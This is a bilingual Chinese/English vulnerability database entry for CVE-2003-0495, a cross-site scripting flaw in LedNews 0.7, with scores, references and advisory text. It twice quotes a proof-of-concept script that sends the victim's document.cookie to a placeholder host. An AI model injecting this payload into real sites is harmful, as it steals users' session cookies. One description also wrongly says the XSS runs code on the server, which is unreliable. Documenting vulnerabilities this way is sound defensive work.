CVE-2003-0495
CVSS4.3
发布时间 :2003-08-07 00:00:00
修订时间 :2016-10-17 22:34:39
NMCOES    

[原文]Cross-site scripting (XSS) vulnerability in LedNews 0.7 allows remote attackers to insert arbitrary web script via a news item.


[CNNVD]LedNews Post跨站脚本(XSS)漏洞(CNNVD-200308-004)

        LedNews 0.7版本存在跨站脚本(XSS)漏洞。远程攻击者借助新闻条目插入任意web脚本。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0495
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0495
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-004
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105578330812212&w=2
(UNKNOWN)  BUGTRAQ  20030615 XSS Vulnerability in LedNews (CGI/Perl) v0.7
http://www.securityfocus.com/bid/7920
(UNKNOWN)  BID  7920
http://xforce.iss.net/xforce/xfdb/12304
(VENDOR_ADVISORY)  XF  lednews-message-xss(12304)

- 漏洞信息

LedNews Post跨站脚本(XSS)漏洞
中危 跨站脚本
2003-08-07 00:00:00 2005-10-20 00:00:00
远程  
        LedNews 0.7版本存在跨站脚本(XSS)漏洞。远程攻击者借助新闻条目插入任意web脚本。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (22777)

LedNews 0.7 Post Script Code Injection Vulnerability (EDBID:22777)
cgi webapps
2003-06-16 Verified
0 gilbert vilvoorde
N/A [点击下载]
source: http://www.securityfocus.com/bid/7920/info

It has been reported that LedNews does not properly filter input from news posts. Because of this, it may be possible for an attacker to steal authentication cookies or perform other nefarious activities. 

<script>
document.location.replace('http://www.example.com/cgi-bin/cookiemonster.cgi?'+document.cookie);
</script> 		

- 漏洞信息

2154
LedNews News Post XSS
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

LedNews contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate news post content upon submission to the program. This could allow a user to send a specially crafted request that would execute arbitrary code on the server leading to a loss of integrity.

- 时间线

2003-06-15 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

LedNews Post Script Code Injection Vulnerability
Input Validation Error 7920
Yes No
2003-06-16 12:00:00 2009-07-11 10:06:00
Discovery credited to "gilbert vilvoorde" <gilbert_vilvoorde@hotmail.com>.

- 受影响的程序版本

Ledscripts.com LedNews 0.7

- 漏洞讨论

It has been reported that LedNews does not properly filter input from news posts. Because of this, it may be possible for an attacker to steal authentication cookies or perform other nefarious activities.

- 漏洞利用

The following proof of concept has been provided:

&lt;script&gt;
document.location.replace('http://www.example.com/cgi-bin/cookiemonster.cgi?'+document.cookie);
&lt;/script&gt;

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站